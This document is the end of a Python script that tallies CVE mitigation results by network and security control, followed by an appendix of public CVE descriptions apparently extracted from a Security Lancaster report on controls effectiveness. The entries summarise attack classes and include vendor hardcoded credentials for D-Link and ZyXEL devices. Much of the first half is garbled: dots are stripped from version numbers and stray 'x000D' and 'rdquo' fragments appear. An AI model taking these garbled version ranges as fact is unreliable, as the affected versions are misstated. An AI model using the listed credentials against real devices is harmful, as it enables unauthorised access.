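            "cve": cells[0],
            "applicable": {n: cells[i + 1].lower() == "y" for i, n in enumerate(NETWORKS)},
            "no_ce": cells[6],
            "with_ce": status,
            "controls": controls,
        })
    return rows


def applicable_counts(rows):
    """How many of the sampled CVEs apply to each network."""
    return Counter(n for r in rows for n in NETWORKS if r["applicable"][n])


def control_credits(rows):
    """How many CVEs each control is credited with fully or partially mitigating."""
    return Counter(c for r in rows if r["with_ce"] != "Not Mitigated" for c in set(r["controls"]))


def status_summary(rows, network=None):
    """With-CE outcome counts, optionally restricted to CVEs applicable to one network."""
    return Counter(r["with_ce"] for r in rows if network is None or r["applicable"][network])


def residual(rows, network):
    """CVEs that apply to the network and are not fully mitigated even with the controls."""
    return [r["cve"] for r in rows if r["applicable"][network] and r["with_ce"] != "Mitigated"]


if __name__ == "__main__":
    rows = parse_table(SAMPLE_TABLE)
    print("applicable per network:", dict(applicable_counts(rows)))
    print("control credits:", dict(control_credits(rows)))
    for net in NETWORKS:
        print(net, dict(status_summary(rows, net)), "residual:", residual(rows, net))
```

Run against the full table, the residual list per network is the set of CVEs the report discusses as only partially covered (typically those waiting on a vendor patch), and the control credits show how much of the mitigation rests on patch management alone.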
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 19 of 28
CVE-2013-1144Memory leak in the IKEv1 implementationin Cisco IOS 151 allows x000D remoteattackers to cause a denial of service(memory consumption) via x000Dunspecified (1) IPv4 or (2) IPv6 IKEpackets aka Bug ID CSCth81055
CVE-2013-1153Cross-site request forgery (CSRF)vulnerability in the web interface x000Din Cisco Prime Infrastructure allowsremote attackers to hijack the x000Dauthentication of arbitrary users aka BugID CSCue84676
CVE-2013-1181Cisco NX-OS on Nexus 5500 devices4x and 5x before 50(3)N2(2) x000DNexus 3000 devices 5x before 50(3)U3(2)and Unified Computing x000D System(UCS) 6200 devices before 20(1w) allowsremote attackers to x000D cause a denialof service (device reload) by sending ajumbo packet to x000D the managementinterface aka Bug IDs CSCtx17544CSCts10593 and x000D CSCtx95389
CVE-2013-1303rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 6 through x000D 10allows remote attackers to execute arbitrarycode via a crafted web x000D site thattriggers access to a deleted object akardquordquoInternet Explorer x000D Use After FreeVulnerabilityrdquordquo a different vulnerabilitythan x000D CVE-2013-1304 and CVE-2013-1338rdquo
CVE-2013-1384Adobe Shockwave Player before 1202122allows attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via unspecified vectors adifferent vulnerability than CVE-2013-1386
CVE-2013-1388Unspecified vulnerability in AdobeColdFusion 90 before Update 10 x000D901 before Update 9 902 before Update4 and 10 before Update 9 x000D allowsattackers to obtain administrator-consoleaccess via unknown x000D vectors
CVE-2013-1450Microsoft Internet Explorer 8 and 9 whenthe Proxy Settings x000D configurationhas the same Proxy address and Portvalues in the HTTP x000D and Securerows does not properly reuse TCPsessions to the proxy x000D server whichallows remote attackers to obtain sensitiveinformation x000D intended for a specifichost via a crafted HTML document thattriggers x000D many HTTPS requests andthen triggers an HTTP request to thathost as x000D demonstrated by reading aCookie header aka MSRC 12096gd
CVE-2013-1472Unspecified vulnerability in the JavaFXcomponent in Oracle Java SE x000DJavaFX 224 and earlier allows remoteattackers to affect x000D confidentialityintegrity and availability via unknownvectors a x000D different vulnerabilitythan other CVEs listed in the February2013 x000D CPU
CVE-2013-1553Unspecified vulnerability in the OracleWeb Services Manager component x000Din Oracle Fusion Middleware 111160allows remote attackers to x000D affect
confidentiality and integrity via unknownvectors related to x000D Web ServicesSecurity
CVE-2013-1620The TLS implementation in MozillaNetwork Security Services (NSS)does x000D not properly considertiming side-channel attacks on anoncompliant x000D MAC checkoperation during the processing ofmalformed CBC padding x000D whichallows remote attackers to conductdistinguishing attacks and x000D plaintext-recovery attacks via statistical analysis oftiming data for x000D crafted packets arelated issue to CVE-2013-0169
CVE-2013-1627Absolute path traversal vulnerability inNTWebServerexe in Indusoft x000DStudio 70 and earlier and AdvantechStudio 70 and earlier allows x000D remoteattackers to read arbitrary files via a fullpathname in an x000D argument to thesub 401A90 CreateFileW function
CVE-2013-1638Opera before 1213 allows remote attackersto execute arbitrary code x000D via craftedclipPaths in an SVG document
CVE-2013-1669Multiple unspecified vulnerabilities in thebrowser engine in Mozilla x000D Firefoxbefore 210 allow remote attackers tocause a denial of x000D service (memorycorruption and application crash) or possiblyexecute x000D arbitrary code via unknownvectors
CVE-2013-1676The SelectionIteratorGetNextSegmentfunction in Mozilla Firefox before210 Firefox ESR 17x before 1706Thunderbird before 1706 andThunderbird ESR 17x before 1706 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsread) via unspecified vectors
CVE-2013-1700The Mozilla Maintenance Service in MozillaFirefox before 220 on x000D Windowsdoes not properly handle inability to launchthe Mozilla x000D Updater executablefile which allows local users to gainprivileges x000D via vectors involvingplacement of a Trojan horse executable fileat x000D an arbitrary location
CVE-2013-1734Cross-site request forgery (CSRF)vulnerability in attachmentcgi in x000DBugzilla 2x 3x and 40x before 401141x and 42x before x000D 427and 43x and 44x before 441 allowsremote attackers to x000D hijack theauthentication of arbitrary users for requeststhat commit x000D an attachment changevia an update action
CVE-2013-1777The JMX Remoting functionality in ApacheGeronimo 3x before 301 as x000D usedin IBM WebSphere Application Server(WAS) Community Edition x000D 3003and other products does not properlyimplement the RMI x000D classloaderwhich allows remote attackers to executearbitrary code x000D by using the JMXconnector to send a crafted serializedobject
CVE-2013-2319FileMaker Pro before 12 and Pro Advancedbefore 12 does not verify x000D X509certificates from SSL servers whichallows man-in-the-middle x000D attackersto spoof servers and obtain sensitiveinformation via a x000D crafted certificate
CVE-2013-2340Unspecified vulnerability on the HPProCurve JCA JCBJDA JDB JEAJFA JFB JFCJGA 658250-B21 and 658247-B21HP 3COM routers and switches and HPH3C routers and switches allows remoteattackers to execute arbitrary code orobtain sensitive information via unknownvectors
CVE-2013-2350Unspecified vulnerability in HP StorageData Protector 62X allows x000D remoteattackers to execute arbitrary code or causea denial of x000D service via unknownvectors aka ZDI-CAN-1897
CVE-2013-2492Stack-based buffer overflow in Firebird213 through 215 before x000D 18514and 251 through 253 before 26623 onWindows allows remote x000D attackersto execute arbitrary code via a craftedpacket to TCP port x000D 3050 relatedto a missing size check during extractionof a group x000D number from CNCTinformation
CVE-2013-2507Multiple cross-site scripting (XSS)vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103)allow remote attackers to inject arbitraryweb script or HTML via the (1) id parameterto adminlog to nethtml or (2) kindparameter to faxcopy settingshtml adifferent vulnerability than CVE-2013-2670and CVE-2013-2671
CVE-2013-2736Adobe Reader and Acrobat 9x before 95510x before 1017 and x000D 11x before11003 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2013-2718 CVE-2013-2719 x000D CVE-2013-2720 CVE-2013-2721 CVE-2013-2722 CVE-2013-2723 x000D CVE-2013-2725 CVE-2013-2726 CVE-2013-2731CVE-2013-2732 x000D CVE-2013-2734CVE-2013-2735 CVE-2013-3337 CVE-2013-3338 x000D CVE-2013-3339 CVE-2013-3340 and CVE-2013-3341
CVE-2013-2780Siemens SIMATIC S7-1200 PLCs 2x and3x allow remote attackers to x000D causea denial of service (defect-mode transitionand control outage) x000D via craftedpackets to UDP port 161 (aka the SNMPport)
CVE-2013-2803ProSoft RadioLinx ControlScape before600040 uses a deficient PRNG x000Dalgorithm and seeding strategy forpassphrases which makes it easier x000Dfor remote attackers to obtain access via abrute-force attack
CVE-2013-2824Schneider Electric StruxureWare SCADAExpert Vijeo Citect 740 Vijeo x000D
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 20 of 28
Citect 720 through 730SP1 CitectSCADA720 through 730SP1 x000DStruxureWare PowerSCADA Expert 730through 730SR1 and PowerLogic x000DSCADA 720 through 720SR1 do notproperly handle exceptions which x000Dallows remote attackers to cause a denialof service via a crafted x000D packet
CVE-2013-2826WellinTech KingSCADA before312 KingAlarmampEvent before 31and x000D KingGraphic before 312perform authentication on the x000DKAEClientManager console rather than onthe server which allows x000D remoteattackers to bypass intended accessrestrictions and discover x000D credentialsvia a crafted packet to TCP port 8130
CVE-2013-2920The DoResolveRelativeHost functionin urlurl canon relativecc in x000DGoogle Chrome before 300159966 allowsremote attackers to cause a x000Ddenial of service (out-of-bounds read)via a relative URL containing a x000Dhostname as demonstrated by a protocol-relative URL beginning with a x000Dwwwgooglecom substring
CVE-2013-3064Open redirect vulnerability inuidynamicunsecuredhtml inLinksys x000D EA6500 with firmware1128147876 allows remote attackers toredirect x000D users to arbitrary web sitesand conduct phishing attacks via a URLin x000D the target parameter
CVE-2013-3116rdquoMicrosoft Internet Explorer 7 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2013-3137rdquoMicrosoft FrontPage 2003 SP3 does notproperly parse DTDs which allows remoteattackers to obtain sensitive information viacrafted XML data in a FrontPage documentaka rdquordquoXML Disclosure Vulnerabilityrdquordquordquo
CVE-2013-3194rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute x000D arbitrary codeor cause a denial of service (memorycorruption) via a x000D crafted website aka rdquordquoInternet Explorer MemoryCorruption x000D Vulnerabilityrdquordquordquo
CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability."
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability."
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.
CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."
CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.
CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.
CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.
CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.
CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.
CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.
CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.
CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.
CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.
CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."
CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."
CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."
CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.
CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.
CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.
CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.
CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.
CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.
CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.
CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.
